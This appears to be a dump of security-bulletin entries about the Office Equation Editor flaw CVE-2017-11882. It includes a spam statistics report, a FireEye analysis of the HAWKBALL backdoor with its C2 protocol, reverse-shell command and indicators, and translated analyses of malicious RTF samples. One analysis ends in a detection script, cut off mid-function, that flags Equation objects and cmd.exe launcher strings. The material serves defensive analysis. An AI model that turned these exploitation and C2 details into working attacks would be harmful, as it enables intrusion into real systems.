email traffic, Q1 2020 – Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164419/sl_spam_report_q2_02-en-dolya-spama-v-pochtovom-trafike-runeta-q1-2020-q2-2020-gg.png>))_\n\nThe Russian segment of the World Wide Web presents the opposite picture, with the end of the quarter accounting for the larger share of spam: spam peaked in June as it reached 51.23 percent. The quarterly average was 50.35 percent, 1.06 p.p. 
lower than the first quarter's average.\n\n### Sources of spam by country\n\n_Countries where spam originated in Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164457/sl_spam_report_q2_03-en-strany-istochniki-spama-v-mire-q2-2020-g.png>))_\n\nThe composition of the top five Q1 2020 spam leaders remained unchanged in the second quarter. Russia kept the lead with 18.52 percent, followed by Germany with 11.94 percent, which had overtaken the US, now third with 10.65 percent. France (7.06 percent) and China (7.02 percent) remained fourth and fifth, respectively.\n\nSixth was the Netherlands (4.21 percent), closely followed by Brazil (2.91 percent), Turkey (2.89 percent), Spain (2.83 percent) and lastly, Japan (2.42 percent).\n\n### Spam email size\n\n_Spam email size, Q1 – Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164535/sl_spam_report_q2_04-en-razmery-spamovyh-pisem-q1-2020-q2-2020-gg.png>))_\n\nThe share of extra small emails kept going down, dropping by 8.6 p.p. to 51.30 percent in Q2 2020. Emails between 5 KB and 10 KB decreased slightly (by 0.66 p.p.) compared to the previous quarter, to 4.90 percent. Meanwhile, the share of spam messages within the range of 10 KB to 20 KB rose by 4.73 p.p. to 11.09 percent. The share of larger messages between 100 KB and 200 KB in the second quarter fell by 1.99 p.p. 
to 2.51 percent compared to Q1 2020.\n\n### Malicious attachments: malware families\n\n_Number of Mail Anti-Virus triggerings, Q1 2020 \u2013 Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164604/sl_spam_report_q2_05-en-kolichestvo-srabatyvanij-pochtovogo-antivirusa-q1-2020-q2-2020-gg.png>))_\n\nOur security solutions detected a total of **43,028,445** malicious email attachments in Q2 2020, an increase of six and a half million year-on-year.\n\n_TOP 10 malicious attachments in mail traffic, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164632/sl_spam_report_q2_06-en-top-10-vredonosnyh-vlozhenij-v-pochtovom-trafike-q2-2020-g.png>))_\n\nTrojan.Win32.Agentb.gen (13.27 percent) was the most widespread malware in email attachments in the second quarter of the year, followed by Trojan-PSW.MSIL.Agensla.gen (7.86 percent) in second place and Exploit.MSOffice.CVE-2017-11882.gen (7.64 percent) in third place.\n\n_TOP 10 malware families in mail traffic, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164702/sl_spam_report_q2_07-en-top-10-vredonosnyh-semejstv-v-pochtovom-trafike-q2-2020-g.png>))_\n\nThe most widespread malware family in the second quarter, as in the previous one, was [Trojan.Win32.Agentb](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Agentb/>) (13.33 percent), followed by [Trojan-PSW.MSIL.Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) (9.40 percent) and [Exploit.MSOffice.CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (7.66 percent).\n\n### Countries targeted by malicious mailshots\n\n_Distribution of Mail Anti-Virus triggerings by country, Q2 2020 
([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164730/sl_spam_report_q2_08-en-raspredelenie-srabatyvanij-pochtovogo-antivirusa-po-stranam-q2-2020-g.png>))_\n\nSpain (8.38%) took the lead in Mail Anti-Virus triggerings in Q2 2020, just as in Q1 2020. Second came Russia with 7.37 percent of attacks, and third came Germany with 7.00 percent.\n\n## Statistics: phishing\n\nKaspersky Anti-Phishing helped to prevent **106,337,531** attempts at redirecting users to phishing Web pages in Q2 2020, a figure that is almost thirteen million lower than that for the first quarter. The share of unique attacked users accounted for 8.26 percent of the total Kaspersky users in the world, with **1,694,705** phishing wildcards added to the system database.\n\n### Attack geography\n\nVenezuela was traditionally the country with the largest share of users attacked by phishers (17.56 percent).\n\n_Geography of phishing attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164806/sl_spam_report_q2_09-en-geografiya-fishingovyh-atak-q1-2020-g-karta.png>))_\n\nPortugal was 4.05 p.p. behind with 13.51 percent, closely followed by Tunisia with 13.12 percent.\n\n**Country** | **%*** \n---|--- \nVenezuela | 17.56% \nPortugal | 13.51% \nTunisia | 13.12% \nFrance | 13.08% \nBrazil | 12.91% \nQatar | 11.94% \nBahrain | 11.88% \nGuadeloupe | 11.73% \nBelgium | 11.56% \nMartinique | 11.34% \n \n_*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky users in the country_\n\n### Top-level domains\n\nStarting with this quarter, we have decided to maintain statistics on top-level domains used in phishing attacks. Quite predictably, COM led by a huge margin, with 43.56 percent of the total number of top-level domain names employed in attacks. It was followed by NET (3.96 percent) and TOP (3.26 percent). 
The Russia-specific RU domain took fourth place with 2.91 percent, followed by ORG with 2.55 percent.\n\n_Top-level domains most popular with phishers, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164838/sl_spam_report_q2_10-en-domennye-zony-verhnego-urovnya-naibolee-chasto-ispolzuemye-fisherami-q2-2020.png>))_\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by the Kaspersky Anti-Phishing component. This component detects pages with phishing content that the user tried to access by following email or Web links, regardless of how the user got to the page: by clicking a link in a phishing email or in a message on a social network, or after being redirected by a malicious program. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nAs in the first quarter, the Online Stores category accounted for the largest share of phishing attacks, its share increasing by 1.3 p.p. to 19.42 percent. Global Web Portals again received the second-largest share of attacks, virtually unchanged at 16.22 percent. Banks (11.61 percent) returned to third place, pushing Social Networks (10.08 percent) to fourth place.\n\n_Distribution of organizations subjected to phishing attacks by category, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164907/sl_spam_report_q2_11-en-raspredelenie-organizacij-chi-polzovateli-byli-atakovany-fisherami-po-kategoriyam-q2-2020-g.png>))_\n\n## Conclusion\n\nIn our summary of the first quarter, we hypothesized that COVID-19 would remain spammers' and phishers' key theme in the future. 
That is exactly what happened: seldom did a mailshot fail to mention the pandemic as phishers added relevance to their tried and tested schemes and came up with brand-new ones.\n\nThe average share of spam in global email traffic in Q2 2020 dropped by 4.43 p.p. to 50.18 percent compared to the previous reporting period, and attempts to access phishing pages amounted to 106 million.\n\nFirst place in the list of spam sources in Q2 went to Russia with a share of 18.52 percent. Our security solutions blocked a total of 43,028,445 malicious email attachments, with the most widespread "email-specific" malware family being Trojan.Win32.Agentb.gen, which infected 13.33 percent of the total email traffic.", "cvss3": {}, "published": "2020-08-07T10:00:07", "type": "securelist", "title": "Spam and phishing in Q2 2020", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2020-08-07T10:00:07", "id": "SECURELIST:53EC9FA168E0493828018AA0C1B799C0", "href": "https://securelist.com/spam-and-phishing-in-q2-2020/97987/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2020-11-23T02:06:52", "description": "FireEye Labs recently observed an attack against the government sector in Central Asia. The attack involved the new HAWKBALL backdoor being delivered via the well-known Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802.\n\nHAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. 
HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.\n\nFigure 1 shows the decoy used in the attack.\n\n \nFigure 1: Decoy used in attack\n\nThe decoy file, doc.rtf (MD5: AC0EAC22CE12EAC9EE15CA03646ED70C), contains an OLE object that uses Equation Editor to drop the embedded shellcode in %TEMP% with the name 8.t. This shellcode is decrypted in memory by EQNEDT32.EXE. Figure 2 shows the decryption mechanism used in EQNEDT32.EXE.\n\n \nFigure 2: Shellcode decryption routine\n\nThe decrypted shellcode is dropped as a Microsoft Word plugin WLL (MD5: D90E45FBF11B5BBDCA945B24D155A4B2) into C:\\Users\\ADMINI~1\\AppData\\Roaming\\Microsoft\\Word\\STARTUP (Figure 3).\n\n \nFigure 3: Payload dropped as Word plugin\n\n#### Technical Details\n\nDllMain of the dropped payload determines whether the string WORD.EXE is present in the sample's command line. If the string is not present, the malware exits. If the string is present, the malware executes the command RunDll32.exe < C:\\Users\\ADMINI~1\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\hh14980443.wll, DllEntry> using the WinExec() function.\n\nDllEntry is the payload's only export function. The malware creates a log file in %TEMP% with the name c3E57B.tmp. On every write, the malware records the current local time plus two hardcoded values in the following format:\n\n<Month int>/<Date int> <Hours>:<Minutes>:<Seconds>\\t<Hardcoded Digit>\\t<Hardcoded Digit>\\n\n\nExample:\n\n05/22 07:29:17 4 0\n\nThis log file is written to every 15 seconds. The last two digits are hard coded and passed as parameters to the function (Figure 4).\n\n \nFigure 4: String format for log file\n\nThe encrypted file contains a 0x78-byte config block. The data is decrypted with an XOR operation using the key byte 0xD9. 
The decrypted data contains command and control (C2) information as well as a mutex string used during malware initialization. Figure 5 shows the decryption routine and the decrypted config file.\n\n \nFigure 5: Config decryption routine\n\nThe IP address from the config file is written to %TEMP%/3E57B.tmp together with the current local time. For example:\n\n05/22 07:49:48 149.28.182.78.\n\n#### Mutex Creation\n\nThe malware creates a mutex to prevent multiple instances of execution. Before naming the mutex, the malware determines whether it is running under the system profile (Figure 6). To do so, the malware resolves the %APPDATA% environment variable and checks whether it contains the string **config/systemprofile**.\n\n \nFigure 6: Verify whether malware is running as a system profile\n\nIf the malware is running under the system profile, the string **d0c** from the decrypted config file is used to create the mutex. Otherwise, the string **_cu** is appended to **d0c** and the mutex is named **d0c_cu** (Figure 7).\n\n \nFigure 7: Mutex creation\n\nAfter the mutex is created, the malware writes another entry in the log file in %TEMP% with the values 32 and 0.\n\n#### Network Communication\n\nHAWKBALL is a backdoor that communicates with a single hard-coded C2 server using HTTP. The C2 server is obtained from the decrypted config file, as shown in Figure 5. The network request is formed with hard-coded values such as the User-Agent. The malware also sets other request header fields, such as:\n\n * Content-Length: <content_length>\n * Cache-Control: no-cache\n * Connection: close\n\nThe malware sends an HTTP GET request to its C2 IP address using HTTP over port 443. 
Figure 8 shows the GET request sent over the network.\n\n \nFigure 8: Network request\n\nThe network request is formed with four parameters in the format shown in Figure 9.\n\n**Format = \"?t=%d&&s=%d&&p=%s&&k=%d\"**\n\n \nFigure 9: GET request parameters formation\n\nTable 1 shows the GET request parameters.\n\n**Value** | **Information**\n---|---\nt | Initially set to 0\ns | Initially set to 0\np | String from decrypted config at 0x68\nk | The result of GetTickCount()\n\nTable 1: GET request parameters\n\nIf the returned response is 200, then the malware sends another GET request (Figure 10) with the following parameters (Figure 11).\n\n**Format = \"?e=%d&&t=%d&&k=%d\"**\n\n \nFigure 10: Second GET request\n\n \nFigure 11: Second GET request parameters formation\n\nTable 2 shows information about the parameters.\n\n**Value** | **Information**\n---|---\ne | Initially set to 0\nt | Initially set to 0\nk | The result of GetTickCount()\n\nTable 2: Second GET request parameters\n\nIf the returned response is 200, the malware examines the Set-Cookie field. This field provides the Command ID. As shown in Figure 10, the Set-Cookie field responds with ID=17.\n\nThis Command ID acts as the index into a function table created by the malware. 
Figure 12 shows the creation of the virtual function table that will perform the backdoor's commands.\n\n \nFigure 12: Function table\n\nTable 3 shows the commands supported by HAWKBALL.\n\n**Command** | **Operation Performed**\n---|---\n0 | Set URI query string to value\n16 | Unknown\n17 | Collect system information\n18 | Execute a provided argument using CreateProcess\n19 | Execute a provided argument using CreateProcess and upload output\n20 | Create a cmd.exe reverse shell, execute a command, and upload output\n21 | Shut down reverse shell\n22 | Unknown\n23 | Shut down reverse shell\n48 | Download file\n64 | Get drive geometry and free space for logical drives C-Z\n65 | Retrieve information about provided directory\n66 | Delete file\n67 | Move file\n\nTable 3: HAWKBALL commands\n\n#### Collect System Information\n\nCommand ID 17 indexes to a function that collects the system information and sends it to the C2 server. The system information includes:\n\n * Computer Name\n * User Name\n * IP Address\n * Active Code Page\n * OEM Code Page\n * OS Version\n * Architecture Details (x32/x64)\n * String at 0x68 offset from decrypted config file\n\nThis information is retrieved from the victim using the following WINAPI calls:\n\n * GetComputerNameA\n * GetUserNameA\n * gethostbyname and inet_ntoa\n * GetACP\n * GetOEMCP\n * GetCurrentProcess and IsWow64Process\n\nThe fields are then assembled using the following format string:\n\n**Format = \"%s;%s;%s;%d;%d;%s;%s %dbit\"**\n\n \nFigure 13: System information\n\nThe collected system information is concatenated together with a semicolon separating each field:\n\nWIN732BIT-L-0;Administrator;10.128.62.115;1252;437;d0c;Windows 7 32bit\n\nThis information is encrypted using an XOR operation. The response from the second GET request is used as the encryption key. 
As shown in Figure 10, the second GET request responds with a 4-byte XOR key. In this case the key is **0xE5044C18**.\n\nOnce encrypted, the system information is sent in the body of an HTTP POST. Figure 14 shows data sent over the network with the POST request.\n\n \nFigure 14: POST request\n\nIn the request header, the field **Cookie** is set with the command ID of the command for which the response is sent. As shown in Figure 14, the Cookie field is set with ID=17, which is the response for the previous command. In the received response, the next command is returned in the Set-Cookie field.\n\nTable 4 shows the parameters of this POST request.\n\n**Parameter** | **Information**\n---|---\ne | Initially set to 0\nt | Decimal form of the little-endian XOR key\nk | The result of GetTickCount()\n\nTable 4: POST request parameters\n\n##### Create Process\n\nThe malware creates a process with specified arguments. Figure 15 shows the operation.\n\n \nFigure 15: Command create process\n\n##### Delete File\n\nThe malware deletes the file specified as an argument. 
Figure 16 shows the operation.\n\n \nFigure 16: Delete file operation\n\n##### Get Directory Information\n\nThe malware gets information for the provided directory path using the following WINAPI calls:\n\n * FindFirstFileW\n * FindNextFileW\n * FileTimeToLocalFileTime\n * FileTimeToSystemTime\n\nFigure 17 shows the APIs used for collecting information.\n\n \nFigure 17: Get directory information\n\n##### Get Disk Information\n\nThis command retrieves the drive information for drives C through Z along with the available disk space for each drive.\n\n \nFigure 18: Retrieve drive information\n\nThe information is stored in the following format for each drive:\n\n**Format = \"%d+%d+%d+%d;\"**\n\nExample: \"8+512+6460870+16751103;\"\n\nThe information for all the available drives is combined and sent to the server using an operation similar to that in Figure 14.\n\n#### Anti-Debugging Tricks\n\n##### Debugger Detection With PEB\n\nThe malware queries the BeingDebugged flag in the PEB to check whether the process is being debugged.\n\n \nFigure 19: Retrieve value from PEB\n\n##### NtQueryInformationProcess\n\nThe malware uses the NtQueryInformationProcess API to detect whether it is being debugged. The following information classes are used:\n\n * Passing value 0x7 to ProcessInformationClass:\n\n \nFigure 20: ProcessDebugPort verification\n\n * Passing value 0x1E to ProcessInformationClass:\n\n \nFigure 21: ProcessDebugFlags verification\n\n * Passing value 0x1F to ProcessInformationClass:\n\n \nFigure 22: ProcessDebugObject\n\n#### Conclusion\n\nHAWKBALL is a new backdoor that provides features attackers can use to collect information from a victim and deliver new payloads to the target. At the time of writing, the FireEye Multi-Vector Execution (MVX) engine is able to recognize and block this threat. 
We advise that all industries remain on alert, though, because the threat actors involved in this campaign may eventually broaden the scope of their current targeting.\n\n#### Indicators of Compromise (IOC)\n\n**MD5** | **Name**\n---|---\nAC0EAC22CE12EAC9EE15CA03646ED70C | Doc.rtf\nD90E45FBF11B5BBDCA945B24D155A4B2 | hh14980443.wll\n\n#### Network Indicators\n\n * 149.28.182[.]78:443\n * 149.28.182[.]78:80\n * http://149.28.182[.]78/?t=0&&s=0&&p=wGH^69&&k=<tick_count>\n * http://149.28.182[.]78/?e=0&&t=0&&k=<tick_count>\n * http://149.28.182[.]78/?e=0&&t=<int_xor_key>&&k=<tick_count>\n * Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)\n\n#### FireEye Detections\n\n**MD5** | **Product** | **Signature** | **Action**\n---|---|---|---\nAC0EAC22CE12EAC9EE15CA03646ED70C | FireEye Email Security, FireEye Network Security, FireEye Endpoint Security | FE_Exploit_RTF_EQGEN_7, Exploit.Generic.MVX | Block\nD90E45FBF11B5BBDCA945B24D155A4B2 | FireEye Email Security, FireEye Network Security, FireEye Endpoint Security | Malware.Binary.Dll, FE_APT_Backdoor_Win32_HawkBall_1, APT.Backdoor.Win.HawkBall | Block\n\n#### Acknowledgement\n\nThank you to Matt Williams for providing reverse engineering support.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-05T15:00:00", "type": "fireeye", "title": "Government Sector in Central Asia Targeted With New HAWKBALL 
Backdoor\nDelivered via Microsoft Office Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-06-05T15:00:00", "id": "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD", "href": "https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2018-12-02T18:49:48", "description": "We recently obtained a Word document with a .doc extension which, on inspection, turned out to be a Rich Text Format document. When opened in a test environment it made a network connection and executed a program, so the sample was judged to be a malicious document. Preliminary analysis found it to be a new sample exploiting the CVE-2017-11882 vulnerability. CVE-2017-11882 and CVE-2018-0802, both rooted in the Office Equation Editor's processing logic, are currently the conventional means of attack with malicious Office documents. 
Analyses of the vulnerability's origin and exploitation are already available online, such as 360 Skyeye Lab's analysis of the latest [AV evasion](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>) technique for CVE-2017-11882 that abuses the Office Equation Editor's special processing logic, and Tencent PC Manager's analysis of a sample that spreads a remote control trojan by combining the NDAY vulnerability CVE-2017-11882 with the 0Day vulnerability CVE-2018-0802. This sample differs slightly from those analyzed previously and appears to be a variant exploiting CVE-2017-11882. \n1. Basic behavior \nTest environment: Windows 7 x64 SP1 (Chinese edition), Office 2010 (Chinese edition). \nAfter the sample is opened, the document content is displayed as garbled text, as shown below. \n! [](https://image.3001.net/images/20181124/1543024815_5bf8b0aff1ceb.png! small) \nIn addition, an executable named emre.exe is created and run in the %temp% directory. Packet capture shows that emre.exe was downloaded from http://ghthf. cf/cert/ochicha. exe, as shown below. \n! [](https://image.3001.net/images/20181124/1543025083_5bf8b1bb3a590.png! small) \n2. Debugging the vulnerability \n1) Sample structure \nOpened in WinHex, the sample appears as in the following two figures. The displayed content of the document comes directly after the header. \n! [](https://image.3001.net/images/20181124/1543025978_5bf8b53ac1bc7.png! small) \nIt is followed by the object, as shown below. \n! [](https://image.3001.net/images/20181124/1543025728_5bf8b44012bda.png! small) \n2) Preliminary RTF analysis \nThe result of analysis with rtfobj is shown below. The CLSID 0002ce02-0000-0000-c000-000000000046 identifies a Microsoft Equation Editor object. \n! [](https://image.3001.net/images/20181124/1543026347_5bf8b6ab810d7.png! small) \n! 
[](https://image.3001.net/images/20181124/1543026881_5bf8b8c10fb6b.png! small) \nFrom the figure we can see that the object name is "eQuatiON native": the normal object name "Equation Native" has had its case altered, possibly also as one of the [AV evasion](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>) measures. \n3) Debugging the vulnerability \nFollowing the various vulnerability analysis reports, we go straight to debugging the vulnerable function at 0041160F. \n! [](https://image.3001.net/images/20181124/1543027328_5bf8ba80a5a02.png! small) \nAfter the 11th rep operation, as shown in the figure below, the value on the stack is overwritten with 0x0043F775. \n! [](https://image.3001.net/images/20181124/1543027588_5bf8bb8428e33.png! small) \n! [](https://image.3001.net/images/20181124/1543027800_5bf8bc58c5a27.png! small) \nIn the EQNEDT32.EXE process, the byte at 0x0043F775 is C3, which happens to be the retn instruction. \n! [](https://image.3001.net/images/20181124/1543028035_5bf8bd439c8e9.png! small) \nAfter it executes, control jumps to the shellcode location, as shown below: \n! [](https://image.3001.net/images/20181124/1543028175_5bf8bdcf72dd2.png! small) \n4) Shellcode debugging and analysis \nThe shellcode is located in the eQuatiON native object and is divided into two parts. The first part starts at offset 0x0826 (B9 C439E66A, shown in the figure above as the disassembly starting at 0018F354) and runs to 0x0851, followed by the four bytes 0x0043F7F5 (the address of the RETN instruction in the EQNEDT32.EXE process). The second part starts at 0x089E and runs to the end. \n! [](https://image.3001.net/images/20181124/1543028371_5bf8be938ff06.png! small) \nThe first part of the shellcode jumps to the second part with the assembly instruction shown below: \n! [](https://image.3001.net/images/20181124/1543029212_5bf8c1dc1ce30.png! 
small) \nAfter analysis, found that the segment of shellcode, a series of jmp jump instruction operation, due to shellcode obfuscation and protection. For example, the following figure shows: \n! [](https://image.3001.net/images/20181124/1543029376_5bf8c280e0d65.png! small)\n\n**[1] [[2]](<92253_2.htm>) [next](<92253_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-12-02T00:00:00", "type": "myhack58", "title": "A CVE-2017-11882 vulnerability is a new variation of a sample of the debugging and analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2018-12-02T00:00:00", "id": "MYHACK58:62201892253", "href": "http://www.myhack58.com/Article/html/3/62/2018/92253.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-25T17:29:45", "description": "! [](/Article/UploadPic/2018-12/20181225205545726. 
png) \nWe recently intercepted an attack sample with a .doc extension whose actual format is RTF. Analysis of the document's composition shows that it exploits CVE-2017-11882 and CVE-2018-0802 and uses an embedded Excel object to trigger the vulnerability. The PE file it drops is used to collect sensitive information from the target user. \n\nI. Basic behaviour \nIn the test environment (Windows 7 x64, Office 2010), opening the document under process monitoring shows that after the winword process starts it first runs excel.exe, then EQNEDT32.exe, then cmd.exe, and finally a process named A.X; EQNEDT32.exe runs twice. Seeing EQNEDT32.exe suggests a CVE-2017-11882 or CVE-2018-0802 sample. \nWhen opened, the document appears blank, as shown below. \n![](/Article/UploadPic/2018-12/20181225205545737.png) \nAt a glance it might pass for empty, but a closer look reveals a small black dot icon in the top-left corner, as shown below. \n![](/Article/UploadPic/2018-12/20181225205545312.png) \nDouble-clicking it brings up the pop-up shown below, which reads \"Windows cannot open this file: A.X\". The \"small black dot\" is evidently an external object. \n![](/Article/UploadPic/2018-12/20181225205545780.png) \nRight-clicking the object and selecting \"Packager Shell Object\" lets you view its \"Properties\", as shown below. \n![](/Article/UploadPic/2018-12/20181225205545220.png) \nThe object's properties are shown below: \n![](/Article/UploadPic/2018-12/20181225205545229.png) \nFrom this we can conclude that the sample embeds a PE file as a Package object in the RTF, which Word drops to the %temp% directory by default when the document is opened, and then uses CVE-2017-11882 or CVE-2018-0802 to execute it. 
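The object-level checks from the two analyses so far (the Equation Editor CLSID and the case-altered "Equation Native" stream name in the first sample; the Package object that drops a PE and the Equation objects that hand off to EQNEDT32.exe in this one), collected into an added triage script. This is example code written for this page, not code from either article: it decodes RTF \objdata hex payloads while discarding the whitespace and control bytes RTF allows between hex digits, parses the OLE1 object header and the OLE Package layout (the same layouts rtfobj reads), searches a compound-file blob case-insensitively for the Equation Native stream name and for a cmd.exe /c launcher string, and reports a Package object's original path. The sample RTF it builds is constructed here and is not the malware; only the class names, the CLSID and the path from the articles are reused.

```python
import re
import struct
import uuid

# Added triage example for the RTF samples analysed above; not code from either
# article. Assumes the OLE1 ObjectHeader / OLE Package layouts (as used by rtfobj).
CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
EQUATION_CLSID = uuid.UUID("0002ce02-0000-0000-c000-000000000046")  # Equation 3.0
_OBJDATA_RE = re.compile(rb"\\objdata\b([^}]*)")
_CONTROL_WORD_RE = re.compile(rb"\\[a-zA-Z]+-?\d* ?")


def extract_objdata(rtf: bytes) -> list:
    """Decode every \\objdata hex payload. RTF permits whitespace and control bytes
    between hex digits (a dropper can split 4d5a with 0x09/0x0d), so keep only hex."""
    blobs = []
    for m in _OBJDATA_RE.finditer(rtf):
        body = _CONTROL_WORD_RE.sub(b"", m.group(1))       # drop nested control words
        digits = re.sub(rb"[^0-9a-fA-F]", b"", body)
        digits = digits[: len(digits) & ~1]                # drop a dangling nibble
        blobs.append(bytes.fromhex(digits.decode("ascii")))
    return blobs


def _lp_string(buf: bytes, pos: int):
    """OLE1 LengthPrefixedAnsiString: DWORD length (incl. NUL), then the bytes."""
    (n,) = struct.unpack_from("<I", buf, pos)
    return buf[pos + 4:pos + 4 + n].rstrip(b"\x00").decode("latin-1"), pos + 4 + n


def parse_ole1(blob: bytes) -> dict:
    """OLE1 ObjectHeader at the start of an embedded \\objdata payload."""
    version, format_id = struct.unpack_from("<II", blob, 0)
    class_name, pos = _lp_string(blob, 8)
    _topic, pos = _lp_string(blob, pos)
    _item, pos = _lp_string(blob, pos)
    (size,) = struct.unpack_from("<I", blob, pos)
    return {"version": version, "format_id": format_id, "class_name": class_name,
            "data": blob[pos + 4:pos + 4 + size]}


def parse_package(data: bytes) -> dict:
    """OLE Package payload: WORD flags, label, original path, DWORD 0x00030000,
    temp path, file. The original path is what leaked the author's user name."""
    label, src_path, rest = data[2:].split(b"\x00", 2)
    (tmp_len,) = struct.unpack_from("<I", rest, 4)
    (file_size,) = struct.unpack_from("<I", rest, 8 + tmp_len)
    return {"label": label.decode("latin-1"), "src_path": src_path.decode("latin-1"),
            "temp_path": rest[8:8 + tmp_len].rstrip(b"\x00").decode("latin-1"),
            "file": rest[12 + tmp_len:12 + tmp_len + file_size]}


def find_stream_name(cfb: bytes, name: str):
    """Case-insensitive search for a UTF-16LE stream name in a compound file;
    returns the name as stored, so 'eQuatiON native' is reported verbatim."""
    parts = [b"[" + c.lower().encode() + c.upper().encode() + b"]\x00" if c.isalpha()
             else re.escape(c.encode()) + b"\x00" for c in name]
    m = re.search(b"".join(parts), cfb)
    return m.group(0).decode("utf-16-le") if m else None


def triage(rtf: bytes) -> list:
    findings = []
    for i, blob in enumerate(extract_objdata(rtf)):
        obj = parse_ole1(blob)
        data = obj["data"]
        f = {"index": i, "class": obj["class_name"], "flags": []}
        if obj["class_name"] == "Package":
            pkg = parse_package(data)
            f["src_path"] = pkg["src_path"]
            if pkg["file"][:2] == b"MZ":
                f["flags"].append("package-drops-pe")
        if data[:8] == CFB_MAGIC:
            stored = find_stream_name(data, "Equation Native")
            if stored is not None:
                f["flags"].append("equation-native")
                if stored != "Equation Native":
                    f["flags"].append("case-altered-stream-name:" + stored)
        if EQUATION_CLSID.bytes_le in data:                 # GUID as stored on disk
            f["flags"].append("equation-clsid")
        if re.search(rb"cmd\.exe\s*/c", data, re.IGNORECASE):
            f["flags"].append("cmd-launcher")
        findings.append(f)
    return findings


def _ole1(class_name: bytes, native: bytes) -> bytes:
    lp = lambda s: struct.pack("<I", len(s) + 1) + s + b"\x00"
    return (struct.pack("<II", 0x0501, 2) + lp(class_name) + lp(b"") + lp(b"")
            + struct.pack("<I", len(native)) + native)


def build_sample_rtf() -> bytes:
    """Constructed stand-in (not the malware): a Package object with a fake PE
    header, and an Equation.3 object; the Package hex is split with tab/CR bytes."""
    fake_pe = b"MZ\x90\x00" + b"\x00" * 12
    src = b"C:\\Users\\n3o\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Word\\A.X"
    tmp = b"C:\\tmp\\A.X\x00"
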